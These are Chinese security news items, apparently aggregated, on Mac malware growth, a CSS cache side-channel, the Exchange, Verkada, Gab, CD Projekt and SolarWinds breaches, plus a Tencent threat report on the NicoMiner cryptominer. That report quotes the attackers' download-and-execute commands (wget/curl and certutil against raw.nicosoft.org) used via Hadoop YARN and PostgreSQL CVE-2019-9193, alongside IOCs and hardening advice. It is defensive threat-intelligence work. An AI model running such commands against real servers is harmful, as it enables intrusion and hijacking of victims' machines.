9to5Mac 报道称：一项针对去年野外发现的新恶意软件的研究表明，macOS 的威胁形势发生了巨大的变化，几乎较 2019 年增加了 1100% 。这项由 Atlas 和 AV-Test 联手开展的调查表明，Mac 用户平均每天面临 1847 个新增威胁。不过结合上下文，可知与同时期 Windows 平台相比，其数量仍不到总威胁的 1% 。 本次调查涉及 Mac 平台的 67 万 4273 个新恶意软件，算是自 2019 年以来的首次大爆发（+1092%）。 作为对比，去年调查发现的新 Mac 恶意软件总数仅为 55556 个，2018 年为 92570 个、2017 年为 28949 个、2016 年更是只有 5208 个。 Atlas 表示，促成 2020 年 macOS 恶意软件数量暴涨的一个主要因素，是因为新恶意软件的工程设计已较以往变得更加容易。 现如今，许多黑客已不需要太高级的编程技能，甚至可以直接购买到现成的代码，然后一键定制出新的恶意软件。 有趣的是，2021 开年至今（3 月中旬），macOS 新增恶意软件的数量反而没有多大的动静（仅为 2474 个）。 至于 Windows 平台，研究发现 2020 年度增加了超过 9100 万个新威胁，是 macOS 威胁的 135 倍以上，平均每天有将近 25 万个新的 Windows 恶意软件。 甚至在 2021 一季度结束前，Windows 平台上就已经遭遇了超过 3300 万个新的恶意软件威胁。           （消息及封面来源：cnBeta）

摘要 NicoMiner利用三个漏洞入侵传播： Hadoop Yarn未授权访问漏洞 PostgreSQL未授权漏洞 PostgreSQL提权代码执行漏洞（CVE-2019-9193）； 利用漏洞入侵成功后会针对Windows、Linux系统分别投放门罗币矿机； 感染量增长较快，一个月内翻倍，受害服务器约3000台； 针对Windows、Linux两个平台的挖矿木马使用相同的钱包； 关联分析发现疑似作者ID：Nico Jiang； 通过腾讯安图查询历史情报，发现作者疑似从事刷量相关的黑产记录。   一、概述 腾讯安全威胁情报中心捕获一起快速增长的挖矿木马NicoMiner，该木马通过Hadoop Yarn未授权访问漏洞、PostgreSQL未授权及提权代码执行漏洞（CVE-2019-9193）进行入侵攻击，会根据操作系统不同分别植入Windows和Linux平台的门罗币挖矿木马。 由于攻击者使用的域名和样本PDB信息中包含“nico jiang”的ID信息，腾讯安全威胁情报中心将该挖矿木马命名为NicoMiner。根据该挖矿木马使用的钱包算力推算，该木马在近一个月内感染量已翻倍，估计受害服务器已达3000台左右。 进一步溯源分析还发现，“nico jiang”在较早时候已从事黑灰产业，该ID陆续注册了与游戏推广、刷量黑灰产有关的域名，近期启用之前留置的相关网络资源从事挖矿黑产。也不排除近期可能有其他黑客掌控 “nico jiang”曾经注册的相关域名和开发设备，用来制作、传播NicoMiner挖矿木马。 腾讯安全全系列产品已支持对NicoMiner挖矿木马攻击传播的各个环节进行检测防御： 排查和加固 由于NicoMiner挖矿木马的攻击呈现明显增长趋势，腾讯安全专家建议企业客户参考以下步骤对系统进行排查和加固： 1.删除进程和文件： 文件： /*/pgsql-*/data/java.* /*/pgsql/data/java.* /*/postgres/*/data/LinuxTF /tmp/java Windows系统 c:\postgresql\*\data\conhost.exe c:\postgresql\*\data\sqltools.exe c:\windows\temp\st.exe c:\program files\postgresql\data\pg*\sqltools.exe 检查CPU占用高的进程： java LinuxTF conhost.exe sqltools.exe 2.加固系统： Hadoop 1)如果Hadoop环境仅对内网提供服务，请不要将其服务开放到外网可访问。 2)如果必须开启公网访问，Hadoop在2.X以上版本提供了安全认证功能，建议管理员升级并启用Kerberos的认证功能，阻止未经授权的访问。 PostgreSQL 1)修改PostgreSQL的访问配置/data/pgsql/9.3/data/pg_hba.conf，限制不受信任的对象进行访问； 2)谨慎考虑分配pg_read_server_files、pg_write_server_files、pg_execute_server_program 角色权限给数据库客户。 二、样本分析 漏洞入侵 1）Hadoop Yarn未授权访问漏洞 Hadoop是一个由Apache基金会所开发的分布式系统基础架构，YARN是hadoop系统上的资源统一管理平台，其主要作用是实现集群资源的统一管理和调度，可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上，通过YARN来管理资源。客户可以向YARN提交特定应用程序进行执行，其中就允许执行相关包含系统命令。 YARN提供有默认开放在8088和8090的REST API（默认前者）允许客户直接通过API进行相关的应用创建、任务提交执行等操作，如果配置不当，REST API将会开放在公网导致未授权访问的问题，攻击者可以在未授权的情况下远程执行代码。 攻击者通过扫描暴露在公网的的8088端口，发现没有开启特定客户安全认证的集群，并通过YARN RESET API提交应用，提交任务的客户名为dr.who。 攻击者在创建的Hadoop应用中通过Post hxxp://ip:8088/ws/v1/cluster/apps执行恶意命令为： wget hxxp://raw.nicosoft.org/java && chmod x java && ./java || curl -O hxxp://raw.nicosoft.org/java && chmod x java && ./java 该命令从黑客控制的服务器上下载挖矿木马java并启动。 2）PostgreSQL未授权访问漏洞 PostgreSQL未授权访问漏洞主要是由于管理员配置不当形成的。PostgreSQL配置文件在/data/pgsql/9.3/data/pg_hba.conf，如果管理员没有正确的配置信任的主机，（如下图），则会导致任意客户无需密码均可访问PostgreSQL数据库。 3）PostgreSQL提权代码执行漏洞（CVE-2019-9193） 2019年3月安全研究人员披露了PostgreSQL提权代码执行漏洞（CVE-2019-9193）的漏洞细节，具有数据库服务端文件读权限的攻击者利用此漏洞，可执行任意系统命令。 此次披露的漏洞存在于导入导出数据的命令“COPY TO/FROM PROGRAM””中，“pg_read_server_files”组内客户执行上述命令后，可获取数据库超级客户权限，从而执行任意系统命令。该漏洞几乎影响了PostgreSQL的所有版本（从9.3到最新版本），同时也影响了所有的操作系统：Windows，Linux和Mac。 受影响PostgreSQL版本：PostgreSQL >=9.3 攻击者通过批量扫描5432端口发现PostgreSQL服务器，然后利用未授权访问漏洞获得了PostgreSQL数据库的访问权限，接着再利用PostgreSQL提权代码执行漏洞（CVE-2019-9193）根据不同的系统执行以下恶意命令： 针对Linux系统： sh -c curl -O hxxp://raw.nicosoft.org/java && chmod +x java && ./java 针对Windows系统： certutil -urlcache -split -f hxxp://raw.nicosoft.org/conhost.exe conhost.exe&start conhost.exe 挖矿 入侵Linux系统下载的挖矿木马java： 入侵Windows系统后下载的dowanload木马conhost.exe，负责继续下载和启动挖矿木马SqlTools.exe 挖矿木马SqlTools.exe   挖矿使用矿池：xmr.f2pool.com 两种系统下的挖矿木马使用同一个钱包： 42Pv7VF4etz1dDPkjRWDEec2FVoFzSPDYKCsjNXDdusaTShBZZn6nr8GyNsqu8ekjSU17jmu7h6SfLg1Lr3rrJnHVokCbso 钱包收益：7个XMR 过去一个月钱包算力翻番，从150kH/s左右涨到了300kH/s，这也意味着感染的机器翻了一倍，估算在3000台左右。   三、关联分析 分析样本发现，dowanload木马conhost.exe中保留了文件的PDB信息，其中“Nico Jiang”疑似木马作者的ID号。 C:\Users\Nico Jiang\source\repos\NicoSoft\x64\Release\conhost.pdb 通过腾讯安图高级威胁溯源系统查询木马下载使用的域名“raw.nicosoft.org”，同样发现了注册者的名字为“Nico Jiang”，推测该ID号是攻击者的可能性较高。 通过搜索引擎搜索，发现域名注册的QQ邮箱对应QQ号所有者，在某个论坛接一些批量登录工具的开发需求。 该ID注册的另一个域名ns-game.top 通过该域名注册使用的outlook邮箱,查询到在github提交的项目，属于相关平台的辅助管理插件： 结论 从对ID “nico jiang”搜索到的信息来看，可以判断该ID对应的人员是一位软件开发人员，曾经从事一些网站、游戏或知名应用的批量登陆工具，刷量工具的开发，具有一定的灰产属性，而相关记录大都在2016年。 可疑的地方是，注册人显示为”nico jiang”的域名raw.nicosoft.org、ns-game.top的注册时间分别在2017年和2018年，而PDB信息包含”nico jiang”的木马样本conhost.exe编译日期是2021年3月21日（更早的样本也只再2021年2月开始出现），两者相隔较远。 推测可能有两种结论，第一种是”nico jiang”在从事灰产的时候注册了相关域名，并在发现了挖矿具有很大的获利空间之后，转向了制作挖矿木马的黑产，并且使用了之前注册的相关域名来提供下载服务。 第二种是有其他黑产获得了”nico jiang”的域名，以及”nico jiang”所使用过的电脑（PDB路径中的客户名通常是开发机器的客户名）的控制权，并且利用这些资源来开发和传播挖矿木马。根据已有的线索来看，属于第一种情况的可能性较大，腾讯安全威胁情报中心会将相关线索提交给有关部门，以对不法分子进行身份确认和追踪。   三、威胁视角看攻击行为 ATT&CK阶段 行为 侦察 扫描IP端口，确认可攻击目标存在的Web服务：Hadoop Yarn, PostgreSQL等。 资源开发 注册C2服务器，制作downlaoder木马，挖矿木马 初始访问 利用对外开放的Hadoop Yarn, PostgreSQL服务漏洞，植入恶意Payload执行恶意命令进而入侵系统 执行 首先植入恶意脚本执行恶意命令，随后下载挖矿木马 防御规避 木马文件加壳保护，将文件命名伪装为系统文件 影响 门罗币矿机不间断的工作，会导致系统CPU负载过大，大量消耗主机CPU资源，严重影响主机正常服务运行，导致主机有系统崩溃风险。 订阅腾讯安全威胁情报产品，赋能全网安全设备 该团伙相关的威胁数据已加入腾讯安全威胁情报，可赋能给腾讯全系列安全产品，推荐政企客户通过订阅腾讯安全威胁情报产品，让全网安全设备同步具备相应的威胁检测、防御能力。 公有云的安全防护 推荐政企客户在公有云中部署腾讯云防火墙、腾讯主机安全（云镜）等产品检测防御相关威胁。 腾讯云防火墙（云镜）已支持拦截利用PostgreSQL提权代码执行漏洞（CVE-2019-9193）发起的恶意攻击行为。 腾讯主机安全可对病毒攻击过程中产生得木马落地文件进行自动检测，客户可后台一键隔离，删除。 私有云的安全防护 私有云客户可通过腾讯T-Sec高级威胁检测系统进行流量检测分析，及时发现黑客团伙的攻击活动。腾讯T-Sec高级威胁检测系统（御界）可检测到利用PostgreSQL提权代码执行漏洞（CVE-2019-9193）发起的恶意攻击行为。 NicoMiner挖矿木马会危害Linux、Windows双平台系统，推荐企业私有云客户在每台终端、服务器部署腾讯T-Sec零信任无边界访问控制系统（iOA），腾讯iOA集成病毒防护和漏洞修复能力可防御病毒木马对终端和服务器的破坏活动。腾讯iOA通过验证客户身份、设备及应用安全状态确定是否允许客户访问企业业务，确保对企业公有云、私有云以及本地业务的可信访问。无论员工位于何处、使用何设备，都可安全访问企业资源和数据。 腾讯安全响应清单 腾讯安全系列产品针对NicoMiner挖矿木马攻击的具体响应清单如下： 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）威胁情报已加入，可赋能全网安全设备。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考: https://cloud.tencent.com/product/tics 腾讯T-Sec 网络空间风险云监测系统 （CCMS） 1）NicoMiner相关情报已加入。 腾讯安全云监测系统，面向行业客户的监管方和被监管方，结合漏洞扫描、涉敏内容检测、全网威胁情报发现能力等，为客户提供全面、及时的互联网风险监测评估服务，并可提供配套安全管家服务，可对相关风险提供有效的响应处理。 腾讯T-Sec 高级威胁追溯系统 1）NicoMiner相关情报已支持检索，可自动关联分析到该病毒家族最新变种，使用资产。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。腾讯T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud  Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，阻断恶意攻击流量，阻断恶意通信流量： 1）NicoMiner相关联的IOCs已支持识别检测； 2）已支持检测以下漏洞利用攻击： Hadoop未授权访问漏洞、Postgres提权代码执行漏洞CVE-2019-9193 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）云镜已支持NicoMiner关联模块的检测告警，查杀清理。 2）已支持检测主机存在的以下相关漏洞： Hadoop未授权访问漏洞、Postgres未授权访问漏洞 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 （SOC） 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）NicoMiner相关联的IOCs已支持识别检测； 2）已支持检测以下漏洞利用攻击： Hadoop未授权访问漏洞、Postgres提权代码执行漏洞CVE-2019-9193 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec 零信任无边界 访问控制系统 （iOA） 1）已支持NicoMiner关联模块的检测告警，查杀清理。 零信任无边界访问控制系统（iOA）是腾讯结合自身丰富的网络安全管理实践经验与“零信任”理念，推出的网络边界访问管控整体解决方案。更多资料，可参考：https://s.tencent.com/product/ioa/index.html   IOCs Domain raw.nicosoft.org IP 154.91.1.27（ZoomEye搜索结果） Md5 Java df840b3decb91ae7480b2ccf95df9f9a Java dba1ef891aed1c769014a0d3aa5ed321 Java 1aa6a96f4a6fcc5c4309f2406d3479ba CONHOST.EXE 32b8a44ee3214ab56e1edbaa016918c7 CONHOST.EXE 0a31ae5882697455a071f73191ed661c CONHOST.EXE 2c31a7243f00afe467e2994d3c249024 conhost.exe bf825890526386dd96e82d2ce57e0303 SqlTools.exe 84757d6b1a94021f246d14b37c1015b8 task.exe 52cd60289ffe8e14c5aa6cb8ea8ad730 LinuxTF f453b9c09ea2fb6a194b5d81d515b0e8 URL hxxp://raw.nicosoft.org/SqlTools.exe hxxp://nicosoft.org/SqlTools.exe hxxp://154.91.1.27/SqlTools.exe hxxp://nicosoft.org/sqltools.exe hxxp://154.91.1.27/sqltools.exe hxxp://raw.nicosoft.org/java hxxp://raw.nicosoft.org/conhost.exe hxxp://154.91.1.27/task.exe hxxp://154.91.1.27/conhost.exe hxxp://154.91.1.27/WinRing0x64.sys hxxp://154.91.1.27/LinuxTF   参考链接： https://s.tencent.com/research/report/1206.html https://s.tencent.com/research/report/1175.html https://cloud.tencent.com/developer/article/1472565  

一支安全研究团队近日展示了基于浏览器的全新旁道攻击（Side-channel attack），即便是 JavaScript 在被阻止的情况下也能生效。目前包括英特尔酷睿、AMD Ryzen、三星 Exynos 甚至于苹果自研芯片 M1 这些硬件平台都受到影响。 为了演示该攻击，安全专家开发了一系列对 JavaScript 功能依赖性降低的攻击，这导致了“首个基于浏览器的旁道攻击”，完全由层叠样式表（CSS）和HTML构建，即使在脚本执行被完全阻止时也能工作。 研究人员表示，这个漏洞甚至可以导致微架构站点指纹攻击。站点指纹攻击允许窃听者通过利用目标数据包序列的特征来确定目标的网络活动。这也就有效地无视了大多数隐私保护技术的应用，如VPN、代理，甚至TOR。 根据该演示背后的研究人员发表的一篇论文，Javascript 已经成为进行旁道攻击的一种流行方式。不过通常情况下浏览器会采用某些方法禁止攻击者精确测量时间，而这是基于 JavaScript 的旁道攻击必不可少的。 论文中写道：“旁道攻击者试图绕过这些限制，通过利用其他浏览器API（如消息传递或多线程）创建具有不同精度的临时计时器”。在浏览器为阻止基于 Javascript 的侧通道攻击所做的所有努力中，最简单的选择是完全禁用 Javascript。例如，苹果在 macOS 上的 Safari 设置中提供了一个完全禁用 Javascript 的选项，以此来减轻此类攻击。 尽管如此，来自美国、澳大利亚和以色列的大学研究人员展示的新形式的攻击依然是有效的，因为它只依赖于 CSS 和 HTML，这使它成为第一个在苹果 M1 芯片上工作的旁道攻击。根据研究论文，分析的重点是 Prime + Probe ，这是一种缓存旁道攻击，它拥有检测目标访问哪些缓存集的能力，然后可以用来洞察目标的情况。 研究人员表示：“除了受到防御措施的影响，微架构攻击还受到消费类设备硬件多样化程度提高的影响。高端处理器市场过去一直由英特尔主导，但过去几年，其他替代产品的普及率越来越高，比如AMD的Zen架构、三星的Exynos，以及最近推出的苹果M1内核”的。 为此研究人员对 AMD 的 Ryzen、三星的 Exynos 和苹果的 M1 芯片进行了攻击评估。结果表明，和英特尔的同类产品相比，有时候攻击在苹果和三星这些新型 CPU 上更加有效，这可能是由于它们的缓存替换策略更简单。 攻击的成功程度取决于目标架构和内部采用的防御措施。该攻击甚至可以在采用英特尔、AMD、三星和苹果 M1 芯片的设备上，针对包括Tor浏览器、Chrome Zero 等在内的强硬浏览器环境发挥作用。 研究人员接着通知了受影响的芯片厂商。苹果公司回应称，公开披露他们的研究结果不会引起任何担忧。对此安全团队表示：“我们推测M1架构利用了不太先进的缓存启发式方法，因此，我们的攻击所执行的简单化内存扫描在这些设备上比在英特尔架构上更能刷新整个缓存”。 团队继续表示：“缓存攻击无法通过降低定时器分辨率，废除定时器、线程或数组，甚至完全禁用脚本支持来防止。这意味着，任何与连接到不受信任网站的浏览器共享缓存资源的秘密承载进程都有潜在的暴露风险”。           （消息来源：cnBeta；封面源自网络）

由于更多的黑客组织涌入，试图在受影响的公司为其服务器打补丁之前趁虚而入，微软Exchange服务器被黑客攻击正成为一个更大的安全问题。微软3月3日披露，黑客组织 “Hafnium”的攻击目标是微软Exchange服务器的漏洞，促使微软发布补丁。 漏洞公布后不久，Hafnium加强了攻击力度，在几天内袭击了3万家美国机构和世界各地的其他机构，但现在其他机构也加入了战团。安全专家告诉《金融时报》，更多的黑客组织正在利用这个机会，利用同样的漏洞进行自己的攻击。包括犯罪集团在内的黑客们，都是在托管服务器的组织打上补丁和保护之前，利用软件漏洞介入的。 对许多人来说，现在先发制人地修补这个问题可能为时已晚。”每一个可能的受害者，如果在上周中到年底还没有打补丁，就已经被至少一个或几个行为者命中了，”安全组织CrowdStrike联合创始人Dmitri Alperovitch这样表示。 在美国之外，欧洲银行业管理局成为第一个确认受到攻击的主要公共机构。 膨胀的攻击规模将在一段时间内成为一个严重的问题，促使政府进行干预。网络安全和基础设施安全局（CISA）已经敦促 “所有部门的所有组织遵循指导，以解决国内和国际上广泛存在的漏洞”。 还有人建议使用微软的IOC检测工具来确定是否发生了脆弱系统的入侵。同时白宫国家安全委员会声称：”任何拥有脆弱服务器的组织都必须立即采取措施，确定是否已经成为目标。”           （消息来源：cnBeta；封面源自网络）

北京时间3月10日消息，一群黑客表示，他们已经入侵了硅谷监控创业公司Verkada收集的海量监控摄像头数据，能够看到医院、公司、警局、监狱以及学校内部的15万个监控摄像头的实时录像情况。 监控视频被曝光的企业包括特斯拉、软件提供商Cloudflare。此外，黑客还能够看到女子卫生诊所、精神病院以及Verkada本身办公室内部的视频。其中一个视频拍摄自特斯拉上海仓库内部，能够看到装配线上的工人。黑客称，他们能够访问特斯拉工厂和仓库内的222个摄像头。 Verkada代表在一份声明中称：“我们已经禁用了所有内部管理员账户来防止任何未经授权的访问。我们的内部安全团队和外部安全团队正在调查这一潜在问题的规模和范围。”特斯拉、Cloudflare等尚未置评。           （消息来源：cnBeta；封面源自网络）

本周五，一位知情人士表示，微软（Microsoft Corp.）电子邮件软件中的一个漏洞遭黑客攻击，超过2万个美国机构已被攻破。此次黑客攻击的范围已经超过了此前从太阳风公司（SolarWinds Corp）下载的所有受污染代码，该公司是去年12月曝光的另一场大规模黑客攻击的核心目标。   美国调查记录显示，最新的黑客攻击使得信用合作社、乡镇政府和小型企业均接入了远程接入渠道。 记录显示，来自亚洲和欧洲的数万个组织也受到了影响。 尽管微软本周二发布了紧急补丁，但黑客攻击仍在继续。 微软最初曾表示，此次黑客攻击是“有限的、有针对性的攻击”，周五却拒绝就问题的规模置评。不过微软公司也表示正与政府机构和安全公司合作，为客户提供帮助。 此外，微软公司补充说，“受到影响的客户应联系我们的支持团队，以获得额外的帮助和资源。” 对连接设备的一次扫描显示，截至本周五，只有10%的易受攻击的设备安装了补丁，不过这一数字还在上升。 由于安装补丁并不能彻底消除漏洞，美国官员正在努力研究如何通知所有受害者，并指导他们进行黑客追捕。 所有受影响的公司似乎都在自己的机器上运行了电子邮件客户端Outlook的Web版本，而不是依赖云提供商。记录显示，后者可能会使许多大公司和联邦政府机构幸免于难。 美国联邦网络安全与基础设施安全局（Federal Cybersecurity and Infrastructure Security Agency）没有回应置评请求。 本周五早些时候，白宫新闻秘书Jen Psaki对记者表示，目前在微软广泛使用的Exchange服务器上发现的漏洞是“重大的”，且“可能产生深远的影响”。 Psaki表示：“我们担心受害者的队伍过于庞大。” 微软和参与美国回应工作的人士将第一波黑客攻击归咎于一名有中国政府背景的演员。但一名中国政府发言人表示，中国不是此次黑客入侵事件的幕后黑手。 从去年年底开始的针对几个典型间谍目标的控制性攻击，已经在上个月发展成为了一场广泛的战役。安全官员表示，这意味着除非中国改变了策略，否则第二个组织可能已经参与其中。 随着用来控制邮件服务器代码的不断传播，预计未来还会有其他黑客发起更多的攻击。 政府工作人员表示，目前黑客们只是利用漏洞重新进入并在受感染的网络中移动，这只占很小比例，可能不到十分之一。 他说：“目前有几百人正在以最快的速度利用它们，窃取数据，并安装其他方法，以便稍后返回。” 最初的攻击途径是由中国台湾知名网络研究员Cheng-Da Tsai发现的。蔡表示，他在今年1月向微软报告了这一漏洞。他在一篇博客文章中说，他正在调查信息是否泄露。 他没有回应进一步置评的请求。           （消息来源：cnBeta；封面源自网络）

在 Palar 被关闭之后，大量用户涌向了一个类似的平台–Gab，不过该平台近日遭到了黑客攻击。超过 1.5 万名 Gab 用户的公共和个人信息被窃取。援引 Wired 报道，该黑客利用 SQL 注入漏洞从后台数据库中窃取了大约 70GB 的平台用户数据，包含该网站的 4000 多万条帖子。 这些数据包括 1.5 万名 Gab 用户的公共、私人互动，并详细说明了用户的个人资料、哈希密码和组别的纯文本密码。而在泄漏的用户中，包括前美国总统特朗普、MyPillow 首席执行官迈克-林德尔，国会女议员马乔里-泰勒-格林和 Infowars 主持人亚历克斯-琼斯等知名人士的账户。不过，该公司否认自己遭遇了数据泄露，并向 Gab 用户保证，他们的密码没有被泄露。 反保密活动组织 DDoSecrets 已经将这些数据汇编成了一个名为 GabLeaks 的东西，打算将其提供给选定的记者、社会科学家和研究人员进行进一步分析。这引起了 Gab 首席执行官安德鲁-托巴的回应，他将这些黑客活动家描述为 “精神病 “恶魔。       （消息及封面来源：cnBeta）

2月25日CDPR官方在微博上宣布，《赛博朋克2077》1.2版更新内容将推迟发布。因为CDPR近期遭受网络攻击，并且1.2版本内容较多需更多时间打磨。预计新的发布时间为三月份的下半月。 尽管我们真切地想要在曾说明的时间内推出《赛博朋克 2077》的1.2 版本更新，但是由于工作室 IT 架构近期遭受网络攻击以及出于1.2 版本本身体量的考虑，我们需要更多时间。 我们为 1.2 版本设定的目标超出了之前的所有更新，它将为游戏各方面带来诸多改善和修复。为了确保这一点，我们还有更多工作要做。因此，我们预计新的发布时间为三月下半。 这并非我们希望分享给大家的消息，但我们需要更为妥善地发布此次版本更新。更多讯息将于届时带来。感谢您一如既往的耐心和支持。 目前《赛博朋克2077》最新的大型更新是1.1版本，主要对多方面的稳定性作出了改善。 据报道，2月24日，《赛博朋克2077》的开发商波兰“CD Projeckt”公司宣布，公司之前遭遇的黑客袭击干扰了游戏补丁包的开发工作，因此该游戏的补丁将会推迟到三月的“后半部分”发行。 这次黑客攻击发生在二月初，黑客攻破了CD Projeckt公司的内部信息系统，其中包括《赛博朋克2077》游戏的源代码。这对于该公司来说是屋漏偏逢连夜雨。之前，《赛博朋克2077》发布之后被爆出问题多多。 该公司在推特官方账号上表示，公司很希望在之前公布的时间段内推出《赛博朋友》1.2版补丁，然而公司IT基础设施遭遇的网络攻击，再加上游戏升级的工作量庞大，这意味着公司将无法按照原定时间发布补丁包，相关开发需要更多时间。 一月份，该公司已经针对《赛博朋克2077》游戏推出了一个补丁包，并且计划在二月份推出一个更大的补丁包。 “CD Projeckt”公司以“巫师”系列中世纪奇幻角色扮演游戏而闻名，这些游戏的成功也导致该公司股价大幅上涨，然而《赛博朋克2077》游戏发布之后出现的问题，导致股价在去年底下跌。 据报道，这一次黑客袭击属于“勒索式攻击”，黑客要求被攻击者支付赎金，除了《赛博朋友2077》游戏源代码之外，黑客还获取了公司员工个人隐私信息以及其他敏感数据。一些信息稍后曾经在网络上销售。 消息人士透露，面对这次勒索攻击，CD Projeckt公司拒绝支付赎金，这导致员工时至今日无法登录公司虚拟专用网，无法获取完成游戏开发的工具。 对于员工来说，这次攻击也是一次“噩梦”。黑客获取了大量员工个人信息，包括波兰身份号码、个人护照信息。公司要求员工紧急冻结个人银行账号，并且向政府机构以及相关银行报告了攻击事件。 另外，该公司还要求员工把个人电脑带到IT部门，检查是否被植入恶意软件或是其他入侵工具。 之前，由于游戏爆出质量问题，索尼公司采取了极端措施，将《赛博朋克2077》游戏从“PlayStation游戏商店”紧急撤架。而1.2版补丁被认为是解决问题的最重大补丁包，该公司表示：“我们对于1.2版补丁的开发目标超过了之前所有的补丁。”       （消息及封面来源：新浪科技）

据外媒CNET报道，美众议院国土安全委员会和监督与改革委员会于当地时间周一宣布，他们将于本周就SolarWinds遭黑客攻击一事举行听证会。在2月26日的听证会上，SolarWinds CEO Sudhakar Ramakrishna、前SolarWinds CEO Kevin Thompson、微软总裁布拉德·史密斯和FireEye CEO Kevin Mandia都将出庭作证。 听证会将对私营公司在预防、调查和补救影响政府并对国家安全造成损害的网络攻击方面的作用展开调查。 此前，美情报机构曾在1月初将发生在去年的SolarWinds黑客事件归咎于俄罗斯。 据悉，该黑客攻击始于2020年3月左右，当时黑客侵入了总部位于德克萨斯州的SolarWinds的IT管理软件。黑客在SolarWinds的软件更新中植入了恶意代码，该公司约1.8万名私人和公共部门客户安装了受病毒感染的更新。 据报道，此次入侵包括美财政部高层使用的电子邮件系统。相关政府官员已经证实，美国财政部、能源部和商务部都遭遇了黑客入侵。据报道，此次黑客攻击的目标还波及到美国土安全部、五角大楼、国务院、国家卫生研究院和国家核安全局。 这场名为Weathering the Storm: The Role of Private Tech in the SolarWinds Breach and Ongoing Campaign的听证会将于美国东部时间2月26日上午9点开始。         （消息及封面来源：cnBeta）

2021 年 1 月 20 日，微软发布了针对 SolarWinds 入侵事件的又一份深度调查报告，并且指出幕后攻击者有着极其高超的黑客技巧和娴熟度。在去年的攻击中，SolarWinds 因 Orion IT 管理软件的封包服务器被恶意软件感染，导致包括微软在内的数以万计的客户，在部署更新后受到了不同程度的影响。 在这篇报告中，微软主要深入探讨了攻击者是如何逃避检测、并通过企业内网进行静默传播的。 “首先，在每台机器上的 Cobalt Strike 动态链接库（DLL）植入都是唯一的，以避免恶意软件自身被筛查到任何重复的痕迹。 其次，攻击者重用了文件、文件夹、导出功能的名称，辅以 C2 域名 / IP、HTTP 请求、时间戳、文件元数据、配置、以及运行子进程。” 如此极端的差异化，同样出现在了不可执行的部分，比如 WMI 过滤查询和持久性过滤器的名称、用于 7-zip 压缩包的文档密码、以及输出日志文件的名称。 想要对每台受感染的计算机执行如此细致筛查，显然是一项让人难以置信的艰苦工作。但攻击者就是通过这样的手段，在很长一段时间内躲过了安全防护系统的检测。 此外攻击者不仅勤奋，还显得相当具有耐心。比如为了避免被检测到，它还会首先枚举目标计算机上运行的远程进程和服务。 接着通过编辑目标计算机的注册表，以禁用特定安全服务进程的自动启动。在切实的攻击发起之前，恶意软件会非常耐心地等待计算机重新启动。 最后，微软指出了 Solorigate 攻击者的其它聪明之处，比如仅在工作时间段内对系统发起攻击，因为此时发生的正常活动会掩盖他们的真实目的。 结合复杂的攻击链和旷日持久的操作，安全防护系统也必须在持续数月的时间里、对攻击者的跨域活动有着全面的了解，辅以历史数据和强大的分析工具，才能尽早地对异常状况展开调查。           （消息来源：cnBeta；封面源自网络）